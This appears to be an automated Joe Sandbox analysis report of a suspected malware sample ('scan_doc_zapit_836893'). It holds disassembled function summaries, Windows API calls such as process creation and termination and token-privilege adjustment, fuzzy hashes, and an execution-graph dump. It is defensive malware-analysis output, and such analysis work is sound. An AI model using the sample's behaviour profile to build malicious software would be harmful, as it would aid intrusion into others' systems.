                                                      • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                      • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                      • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringlstrcmp
                                                      • String ID: !N~
                                                      • API String ID: 623250636-529124213
                                                      • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                      • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                      • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                      • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                      • CloseHandle.KERNEL32(?), ref: 00405C71
                                                      Strings
                                                      • Error launching installer, xrefs: 00405C48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                      • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                      • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                      • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                      APIs
                                                      • lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                      • String ID: Sleep(4921)
                                                      • API String ID: 3509786178-3001734206
                                                      • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                      • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                      • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                      • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                      • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                      • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                      • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                      • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:2.4%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:97
                                                      execution_graph 98374 a89a88 98377 a886e0 98374->98377 98378 a886fd 98377->98378 98379 ac0fad 98378->98379 98380 ac0ff8 98378->98380 98404 a88724 98378->98404 98383 ac0fb5 98379->98383 98387 ac0fc2 98379->98387 98379->98404 98452 afaad0 316 API calls __cinit 98380->98452 98450 afb0e4 316 API calls 98383->98450 98401 a8898d 98387->98401 98451 afb58c 316 API calls 3 library calls 98387->98451 98388 ac1289 98388->98388 98390 ac11af 98459 afae3b 89 API calls 98390->98459 98392 a83f42 68 API calls 98392->98404 98394 a88a17 98400 a83c30 68 API calls 98400->98404 98401->98394 98460 aea48d 89 API calls 4 library calls 98401->98460 98404->98390 98404->98392 98404->98394 98404->98400 98404->98401 98406 a853b0 98404->98406 98434 a839be 98404->98434 98438 a83938 68 API calls 98404->98438 98439 a8855e 316 API calls 98404->98439 98440 a85278 98404->98440 98445 aa2f70 98404->98445 98448 a884e2 89 API calls 98404->98448 98449 a8835f 316 API calls 98404->98449 98453 a8523c 59 API calls 98404->98453 98454 ad73ab 59 API calls 98404->98454 98455 a91c9c 98404->98455 98407 a853cf 98406->98407 98430 a853fd Mailbox 98406->98430 98461 aa0fe6 98407->98461 98409 a869ff 98413 abe691 98409->98413 98414 abf165 98409->98414 98410 a869fa 98411 a91c9c 59 API calls 98410->98411 98428 a85569 Mailbox 98411->98428 98412 aa0fe6 59 API calls Mailbox 98412->98430 98473 aea48d 89 API calls 4 library calls 98413->98473 98477 aea48d 89 API calls 4 library calls 98414->98477 98415 a91207 59 API calls 98415->98430 98419 aa2f70 67 API calls __cinit 98419->98430 98420 abe6a0 98420->98404 98421 a91c9c 59 API calls 98421->98430 98423 abea9a 98425 a91c9c 59 API calls 98423->98425 98425->98428 98426 ad7aad 59 API calls 98426->98430 98427 abeb67 98427->98428 98474 ad7aad 59 API calls 98427->98474 98428->98404 98430->98409 98430->98410 98430->98412 98430->98413 98430->98415 98430->98419 98430->98421 98430->98423 98430->98426 98430->98427 98430->98428 98431 abef28 98430->98431 98433 a85a1a 98430->98433 98471 a87e50 316 API calls 2 library calls 98430->98471 98472 a86e30 60 API calls Mailbox 98430->98472 98475 aea48d 89 API calls 4 library calls 98431->98475 98476 aea48d 89 API calls 4 library calls 98433->98476 98435 a839c9 98434->98435 98436 a839f0 98435->98436 98506 a83ea3 68 API calls Mailbox 98435->98506 98436->98404 98438->98404 98439->98404 98441 aa0fe6 Mailbox 59 API calls 98440->98441 98442 a85285 98441->98442 98443 a85294 98442->98443 98507 a91a36 98442->98507 98443->98404 98511 aa2e74 98445->98511 98447 aa2f7b 98447->98404 98448->98404 98449->98404 98450->98387 98451->98401 98452->98404 98453->98404 98454->98404 98456 a91caf 98455->98456 98457 a91ca7 98455->98457 98456->98404 98589 a91bcc 59 API calls 2 library calls 98457->98589 98459->98401 98460->98388 98464 aa0fee 98461->98464 98463 aa1008 98463->98430 98464->98463 98466 aa100c std::exception::exception 98464->98466 98478 aa593c 98464->98478 98495 aa35d1 DecodePointer 98464->98495 98496 aa87cb RaiseException 98466->98496 98468 aa1036 98497 aa8701 58 API calls _free 98468->98497 98470 aa1048 98470->98430 98471->98430 98472->98430 98473->98420 98474->98428 98475->98433 98476->98428 98477->98428 98479 aa59b7 98478->98479 98492 aa5948 98478->98492 98504 aa35d1 DecodePointer 98479->98504 98481 aa59bd 98505 aa8d58 58 API calls __getptd_noexit 98481->98505 98482 aa5953 98482->98492 98498 aaa39b 58 API calls 2 library calls 98482->98498 98499 aaa3f8 58 API calls 7 library calls 98482->98499 98500 aa32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98482->98500 98485 aa597b RtlAllocateHeap 98485->98492 98494 aa59af 98485->98494 98487 aa59a3 98502 aa8d58 58 API calls __getptd_noexit 98487->98502 98491 aa59a1 98503 aa8d58 58 API calls __getptd_noexit 98491->98503 98492->98482 98492->98485 98492->98487 98492->98491 98501 aa35d1 DecodePointer 98492->98501 98494->98464 98495->98464 98496->98468 98497->98470 98498->98482 98499->98482 98501->98492 98502->98491 98503->98494 98504->98481 98505->98494 98506->98436 98508 a91a45 __wsetenvp _memmove 98507->98508 98509 aa0fe6 Mailbox 59 API calls 98508->98509 98510 a91a83 98509->98510 98510->98443 98512 aa2e80 __read 98511->98512 98519 aa3447 98512->98519 98518 aa2ea7 __read 98518->98447 98536 aa9e3b 98519->98536 98521 aa2e89 98522 aa2eb8 DecodePointer DecodePointer 98521->98522 98523 aa2e95 98522->98523 98524 aa2ee5 98522->98524 98533 aa2eb2 98523->98533 98524->98523 98582 aa89d4 59 API calls __wtof_l 98524->98582 98526 aa2f48 EncodePointer EncodePointer 98526->98523 98527 aa2f1c 98527->98523 98531 aa2f36 EncodePointer 98527->98531 98584 aa8a94 61 API calls 2 library calls 98527->98584 98528 aa2ef7 98528->98526 98528->98527 98583 aa8a94 61 API calls 2 library calls 98528->98583 98531->98526 98532 aa2f30 98532->98523 98532->98531 98585 aa3450 98533->98585 98537 aa9e5f EnterCriticalSection 98536->98537 98538 aa9e4c 98536->98538 98537->98521 98543 aa9ec3 98538->98543 98540 aa9e52 98540->98537 98567 aa32e5 58 API calls 3 library calls 98540->98567 98544 aa9ecf __read 98543->98544 98545 aa9ed8 98544->98545 98546 aa9ef0 98544->98546 98568 aaa39b 58 API calls 2 library calls 98545->98568 98555 aa9f11 __read 98546->98555 98571 aa8a4d 58 API calls 2 library calls 98546->98571 98548 aa9edd 98569 aaa3f8 58 API calls 7 library calls 98548->98569 98551 aa9f05 98553 aa9f1b 98551->98553 98554 aa9f0c 98551->98554 98552 aa9ee4 98570 aa32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98552->98570 98558 aa9e3b __lock 58 API calls 98553->98558 98572 aa8d58 58 API calls __getptd_noexit 98554->98572 98555->98540 98559 aa9f22 98558->98559 98561 aa9f2f 98559->98561 98562 aa9f47 98559->98562 98573 aaa05b InitializeCriticalSectionAndSpinCount 98561->98573 98574 aa2f85 98562->98574 98565 aa9f3b 98580 aa9f63 LeaveCriticalSection _doexit 98565->98580 98568->98548 98569->98552 98571->98551 98572->98555 98573->98565 98575 aa2fb7 __dosmaperr 98574->98575 98576 aa2f8e RtlFreeHeap 98574->98576 98575->98565 98576->98575 98577 aa2fa3 98576->98577 98581 aa8d58 58 API calls __getptd_noexit 98577->98581 98579 aa2fa9 GetLastError 98579->98575 98580->98555 98581->98579 98582->98528 98583->98527 98584->98532 98588 aa9fa5 LeaveCriticalSection 98585->98588 98587 aa2eb7 98587->98518 98588->98587 98589->98456 98590 a89a6c 98593 a8829c 98590->98593 98592 a89a78 98594 a882b4 98593->98594 98601 a88308 98593->98601 98595 a853b0 316 API calls 98594->98595 98594->98601 98599 a882eb 98595->98599 98597 ac0ed8 98597->98597 98598 a88331 98598->98592 98599->98598 98602 a8523c 59 API calls 98599->98602 98601->98598 98603 aea48d 89 API calls 4 library calls 98601->98603 98602->98601 98603->98597 98604 ae92c8 98605 ae92db 98604->98605 98606 ae92d5 98604->98606 98608 ae92ec 98605->98608 98609 aa2f85 _free 58 API calls 98605->98609 98607 aa2f85 _free 58 API calls 98606->98607 98607->98605 98610 ae92fe 98608->98610 98611 aa2f85 _free 58 API calls 98608->98611 98609->98608 98611->98610 98612 abe463 98624 a8373a 98612->98624 98614 abe479 98615 abe48f 98614->98615 98617 abe4fa 98614->98617 98675 a85376 60 API calls 98615->98675 98633 a8b020 98617->98633 98620 abf046 Mailbox 98621 abe4ce 98623 abe4ee Mailbox 98621->98623 98676 ae890a 59 API calls Mailbox 98621->98676 98623->98620 98677 aea48d 89 API calls 4 library calls 98623->98677 98625 a83758 98624->98625 98626 a83746 98624->98626 98628 a8375e 98625->98628 98629 a83787 98625->98629 98678 a8523c 59 API calls 98626->98678 98631 aa0fe6 Mailbox 59 API calls 98628->98631 98679 a8523c 59 API calls 98629->98679 98632 a83750 98631->98632 98632->98614 98680 a93740 98633->98680 98636 ac30b6 98779 aea48d 89 API calls 4 library calls 98636->98779 98638 a8b07f 98638->98636 98639 ac30d4 98638->98639 98669 a8bb86 98638->98669 98672 a8b132 Mailbox _memmove 98638->98672 98780 aea48d 89 API calls 4 library calls 98639->98780 98641 ac355e 98674 a8b4dd 98641->98674 98791 aea48d 89 API calls 4 library calls 98641->98791 98642 ad730a 59 API calls 98642->98672 98643 ac3106 98651 ac318a 98643->98651 98781 a8a9de 316 API calls 98643->98781 98650 aa0fe6 59 API calls Mailbox 98650->98672 98651->98674 98782 aea48d 89 API calls 4 library calls 98651->98782 98652 a853b0 316 API calls 98652->98672 98653 a83b31 59 API calls 98653->98672 98656 ac3418 98657 a853b0 316 API calls 98656->98657 98658 ac3448 98657->98658 98662 a839be 68 API calls 98658->98662 98658->98674 98665 ac346f 98662->98665 98663 ac31c3 98783 aea48d 89 API calls 4 library calls 98663->98783 98664 a83c30 68 API calls 98664->98672 98789 aea48d 89 API calls 4 library calls 98665->98789 98778 aea48d 89 API calls 4 library calls 98669->98778 98670 a8523c 59 API calls 98670->98672 98671 a91c9c 59 API calls 98671->98672 98672->98641 98672->98642 98672->98643 98672->98650 98672->98652 98672->98653 98672->98656 98672->98663 98672->98664 98672->98665 98672->98669 98672->98670 98672->98671 98672->98674 98685 a83add 98672->98685 98692 a8bc70 98672->98692 98776 a83a40 59 API calls Mailbox 98672->98776 98777 a85190 59 API calls Mailbox 98672->98777 98784 ad6c62 59 API calls 2 library calls 98672->98784 98785 afa9c3 85 API calls Mailbox 98672->98785 98786 ad6c1e 59 API calls Mailbox 98672->98786 98787 ae5ef2 68 API calls 98672->98787 98788 a83ea3 68 API calls Mailbox 98672->98788 98790 aea12a 59 API calls 98672->98790 98674->98623 98675->98621 98676->98623 98677->98620 98678->98632 98679->98632 98681 a9374f 98680->98681 98684 a9376a 98680->98684 98792 a91aa4 98681->98792 98683 a93757 CharUpperBuffW 98683->98684 98684->98638 98686 abd3cd 98685->98686 98687 a83aee 98685->98687 98688 aa0fe6 Mailbox 59 API calls 98687->98688 98689 a83af5 98688->98689 98690 a83b16 98689->98690 98796 a83ba5 59 API calls Mailbox 98689->98796 98690->98672 98693 ac359f 98692->98693 98705 a8bc95 98692->98705 98946 aea48d 89 API calls 4 library calls 98693->98946 98695 a8bf3b 98695->98672 98699 a8c2b6 98699->98695 98700 a8c2c3 98699->98700 98944 a8c483 316 API calls Mailbox 98700->98944 98703 a8c2ca LockWindowUpdate DestroyWindow GetMessageW 98703->98695 98704 a8c2fc 98703->98704 98706 ac4509 TranslateMessage DispatchMessageW GetMessageW 98704->98706 98766 a8bca5 Mailbox 98705->98766 98947 a85376 60 API calls 98705->98947 98948 ad700c 316 API calls 98705->98948 98706->98706 98708 ac4539 98706->98708 98707 ac36b3 Sleep 98707->98766 98708->98695 98709 a85376 60 API calls 98709->98766 98710 ac405d WaitForSingleObject 98714 ac407d GetExitCodeProcess CloseHandle 98710->98714 98710->98766 98711 a8bf54 timeGetTime 98711->98766 98713 a8c210 Sleep 98713->98766 98722 a8c36b 98714->98722 98715 a91c9c 59 API calls 98715->98766 98717 ac43a9 Sleep 98745 ac3895 Mailbox 98717->98745 98718 aa0fe6 59 API calls Mailbox 98718->98766 98722->98672 98723 a8c324 timeGetTime 98945 a85376 60 API calls 98723->98945 98727 ac4440 GetExitCodeProcess 98729 ac446c CloseHandle 98727->98729 98730 ac4456 WaitForSingleObject 98727->98730 98729->98745 98730->98729 98730->98766 98732 b06562 110 API calls 98732->98745 98733 a86d79 109 API calls 98733->98766 98735 ac38aa Sleep 98735->98766 98736 ac44c8 Sleep 98736->98766 98739 a91a36 59 API calls 98739->98745 98744 a8c26d 98748 a91a36 59 API calls 98744->98748 98745->98722 98745->98727 98745->98732 98745->98735 98745->98736 98745->98739 98745->98766 98973 a91207 98745->98973 98978 ae2baf 60 API calls 98745->98978 98979 a85376 60 API calls 98745->98979 98980 a83ea3 68 API calls Mailbox 98745->98980 98981 a86cd8 316 API calls 98745->98981 99022 ad70e2 59 API calls 98745->99022 99023 ae57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98745->99023 99024 aa083e timeGetTime 98745->99024 99025 ae4148 CreateToolhelp32Snapshot Process32FirstW 98745->99025 98746 a8b020 294 API calls 98746->98766 98750 a8bf25 Mailbox 98748->98750 98750->98695 98943 a8c460 10 API calls Mailbox 98750->98943 98751 aea48d 89 API calls 98751->98766 98753 a85190 59 API calls Mailbox 98753->98766 98755 a83ea3 68 API calls 98755->98766 98756 a853b0 294 API calls 98756->98766 98757 a839be 68 API calls 98757->98766 98759 a91a36 59 API calls 98759->98766 98760 ad6cf1 59 API calls Mailbox 98760->98766 98761 ac3e13 VariantClear 98761->98766 98762 ac3ea9 VariantClear 98762->98766 98763 a841c4 59 API calls Mailbox 98763->98766 98764 ac3c57 VariantClear 98764->98766 98765 ad7aad 59 API calls 98765->98766 98766->98707 98766->98709 98766->98710 98766->98711 98766->98713 98766->98715 98766->98717 98766->98718 98766->98722 98766->98723 98766->98733 98766->98744 98766->98745 98766->98746 98766->98750 98766->98751 98766->98753 98766->98755 98766->98756 98766->98757 98766->98759 98766->98760 98766->98761 98766->98762 98766->98763 98766->98764 98766->98765 98767 a86cd8 294 API calls 98766->98767 98797 a852b0 98766->98797 98806 a89a00 98766->98806 98813 a89c80 98766->98813 98844 a8a820 98766->98844 98861 aff01c 98766->98861 98883 aee4a0 98766->98883 98886 aec270 98766->98886 98893 afe60c 98766->98893 98896 a8e36d 98766->98896 98905 ae412a 98766->98905 98908 aebcd6 98766->98908 98938 a942cf 98766->98938 98942 aa083e timeGetTime 98766->98942 98949 b06655 59 API calls 98766->98949 98950 aea058 59 API calls Mailbox 98766->98950 98951 ade0aa 59 API calls 98766->98951 98952 a84d37 98766->98952 98970 ad6c62 59 API calls 2 library calls 98766->98970 98971 a838ff 59 API calls 98766->98971 98972 a83a40 59 API calls Mailbox 98766->98972 98982 afc355 98766->98982 98767->98766 98776->98672 98777->98672 98778->98636 98779->98674 98780->98674 98781->98651 98782->98674 98783->98674 98784->98672 98785->98672 98786->98672 98787->98672 98788->98672 98789->98674 98790->98672 98791->98674 98793 a91ab7 98792->98793 98795 a91ab4 _memmove 98792->98795 98794 aa0fe6 Mailbox 59 API calls 98793->98794 98794->98795 98795->98683 98796->98690 98798 a852c6 98797->98798 98800 a85313 98797->98800 98799 a852d3 PeekMessageW 98798->98799 98798->98800 98799->98800 98801 a852ec 98799->98801 98800->98801 98803 abdf68 TranslateAcceleratorW 98800->98803 98804 a8533e PeekMessageW 98800->98804 98805 a85352 TranslateMessage DispatchMessageW 98800->98805 99035 a8359e 98800->99035 98801->98766 98803->98800 98803->98804 98804->98800 98804->98801 98805->98804 98807 a89a1d 98806->98807 98808 a89a31 98806->98808 99040 a894e0 98807->99040 99074 aea48d 89 API calls 4 library calls 98808->99074 98810 a89a28 98810->98766 98812 ac2478 98812->98812 98814 a89cb5 98813->98814 98815 ac247d 98814->98815 98818 a89d1f 98814->98818 98827 a89d79 98814->98827 98816 a853b0 316 API calls 98815->98816 98817 ac2492 98816->98817 98842 a89f50 Mailbox 98817->98842 99084 aea48d 89 API calls 4 library calls 98817->99084 98821 a91207 59 API calls 98818->98821 98818->98827 98819 a91207 59 API calls 98819->98827 98823 ac24d8 98821->98823 98822 aa2f70 __cinit 67 API calls 98822->98827 98825 aa2f70 __cinit 67 API calls 98823->98825 98824 ac24fa 98824->98766 98825->98827 98826 a839be 68 API calls 98826->98842 98827->98819 98827->98822 98827->98824 98830 a89f3a 98827->98830 98827->98842 98828 a853b0 316 API calls 98828->98842 98830->98842 99085 aea48d 89 API calls 4 library calls 98830->99085 98831 aea48d 89 API calls 98831->98842 98834 a8a775 99089 aea48d 89 API calls 4 library calls 98834->99089 98836 ac27f9 98836->98766 98837 a84230 59 API calls 98837->98842 98842->98826 98842->98828 98842->98831 98842->98834 98842->98837 98843 a8a058 98842->98843 99083 a91bcc 59 API calls 2 library calls 98842->99083 99086 ad7aad 59 API calls 98842->99086 99087 afccac 316 API calls 98842->99087 99088 afbc26 316 API calls Mailbox 98842->99088 99090 a85190 59 API calls Mailbox 98842->99090 99091 af9ab0 316 API calls Mailbox 98842->99091 98843->98766 98845 ac2d51 98844->98845 98848 a8a84c 98844->98848 99093 aea48d 89 API calls 4 library calls 98845->99093 98847 ac2d62 98847->98766 98849 ac2d6a 98848->98849 98859 a8a888 _memmove 98848->98859 99094 aea48d 89 API calls 4 library calls 98849->99094 98851 a8a962 98852 a8a975 98851->98852 99092 afa9c3 85 API calls Mailbox 98851->99092 98852->98766 98854 aa0fe6 59 API calls Mailbox 98854->98859 98855 ac2dae 99095 a8a9de 316 API calls 98855->99095 98857 a853b0 316 API calls 98857->98859 98858 ac2dc8 98858->98852 99096 aea48d 89 API calls 4 library calls 98858->99096 98859->98851 98859->98852 98859->98854 98859->98855 98859->98857 98859->98858 98862 a84d37 84 API calls 98861->98862 98863 aff03f 98862->98863 98864 ae4148 66 API calls 98863->98864 98865 aff050 98864->98865 98866 aff086 OpenProcess 98865->98866 98872 aff055 98865->98872 98867 aff149 TerminateProcess 98866->98867 98868 aff0a0 GetLastError 98866->98868 98869 aff18b CloseHandle 98867->98869 98870 aff156 GetLastError 98867->98870 98871 aff0ab 98868->98871 98879 aff115 98868->98879 98869->98872 98877 aff16a 98870->98877 99097 ae3aa0 63 API calls Mailbox 98871->99097 98872->98766 98874 aff0b9 99098 ad9399 62 API calls Mailbox 98874->99098 98876 aff0c3 98878 aff0c7 OpenProcess 98876->98878 98881 aff0d9 98876->98881 98877->98869 98878->98881 98879->98867 98879->98872 99099 ad8de9 AdjustTokenPrivileges CloseHandle 98881->99099 98882 aff113 98882->98879 99100 aef87d 98883->99100 98885 aee4b0 98885->98766 98887 a84d37 84 API calls 98886->98887 98888 aec286 98887->98888 99251 ae4005 98888->99251 98890 aec28e 98891 aec292 GetLastError 98890->98891 98892 aec2a7 98890->98892 98891->98892 98892->98766 99396 afd1c6 98893->99396 98895 afe61c 98895->98766 99513 a8502b 98896->99513 98898 a8e381 98899 a8e3bc Sleep 98898->98899 98900 a8e385 timeGetTime 98898->98900 98902 a8e3b4 98899->98902 98901 a8502b 59 API calls 98900->98901 98903 a8e39b 98901->98903 98902->98766 98904 a8bc70 314 API calls 98903->98904 98904->98902 99518 ae494a GetFileAttributesW 98905->99518 98909 aebcf5 98908->98909 98935 aebdbb Mailbox 98908->98935 98910 a8502b 59 API calls 98909->98910 98912 aebd00 98910->98912 98911 a84d37 84 API calls 98913 aebdf3 98911->98913 98915 a8502b 59 API calls 98912->98915 98914 a84d37 84 API calls 98913->98914 98916 aebe05 98914->98916 98917 aebd14 98915->98917 99534 ae3ce2 98916->99534 98919 a91207 59 API calls 98917->98919 98917->98935 98920 aebd25 98919->98920 98921 a91207 59 API calls 98920->98921 98922 aebd2e 98921->98922 98923 a84d37 84 API calls 98922->98923 98924 aebd3b 98923->98924 98925 aa0119 59 API calls 98924->98925 98926 aebd4e 98925->98926 98927 a917e0 59 API calls 98926->98927 98928 aebd5f 98927->98928 98929 ae412a 3 API calls 98928->98929 98937 aebd88 Mailbox 98928->98937 98931 aebd6e 98929->98931 98930 a8502b 59 API calls 98930->98935 98932 a91a36 59 API calls 98931->98932 98931->98937 98933 aebd7f 98932->98933 99522 ae3f1d 98933->99522 98935->98911 98936 aebdc3 Mailbox 98935->98936 98936->98766 98937->98930 98939 a942d9 98938->98939 98940 a942e8 98938->98940 98939->98766 98940->98939 98941 a942ed CloseHandle 98940->98941 98941->98939 98942->98766 98943->98699 98944->98703 98945->98766 98946->98705 98947->98705 98948->98705 98949->98766 98950->98766 98951->98766 98953 a84d4b 98952->98953 98954 a84d51 98952->98954 98953->98766 98955 abdb28 __i64tow 98954->98955 98956 a84d99 98954->98956 98958 a84d57 __itow 98954->98958 98961 abda2f 98954->98961 99650 aa38c8 83 API calls 3 library calls 98956->99650 98960 aa0fe6 Mailbox 59 API calls 98958->98960 98962 a84d71 98960->98962 98963 aa0fe6 Mailbox 59 API calls 98961->98963 98965 abdaa7 Mailbox _wcscpy 98961->98965 98962->98953 98964 a91a36 59 API calls 98962->98964 98966 abda74 98963->98966 98964->98953 99651 aa38c8 83 API calls 3 library calls 98965->99651 98967 aa0fe6 Mailbox 59 API calls 98966->98967 98968 abda9a 98967->98968 98968->98965 98969 a91a36 59 API calls 98968->98969 98969->98965 98970->98766 98971->98766 98972->98766 98974 aa0fe6 Mailbox 59 API calls 98973->98974 98975 a91228 98974->98975 98976 aa0fe6 Mailbox 59 API calls 98975->98976 98977 a91236 98976->98977 98977->98745 98978->98745 98979->98745 98980->98745 98981->98745 98983 afc39a 98982->98983 98984 afc380 98982->98984 99652 afa8fd 98983->99652 99679 aea48d 89 API calls 4 library calls 98984->99679 98988 a853b0 315 API calls 98989 afc406 98988->98989 98990 afc392 Mailbox 98989->98990 98991 afc498 98989->98991 98994 afc447 98989->98994 98990->98766 98992 afc4ee 98991->98992 98993 afc49e 98991->98993 98992->98990 98995 a84d37 84 API calls 98992->98995 99680 ae7ed5 59 API calls 98993->99680 98999 ae789a 59 API calls 98994->98999 98997 afc500 98995->98997 99000 a91aa4 59 API calls 98997->99000 98998 afc4c1 99681 a935b9 59 API calls Mailbox 98998->99681 99002 afc477 98999->99002 99003 afc524 CharUpperBuffW 99000->99003 99005 ad6ebc 315 API calls 99002->99005 99006 afc53e 99003->99006 99004 afc4c9 Mailbox 99009 a8b020 315 API calls 99004->99009 99005->98990 99007 afc545 99006->99007 99008 afc591 99006->99008 99659 ae789a 99007->99659 99010 a84d37 84 API calls 99008->99010 99009->98990 99011 afc599 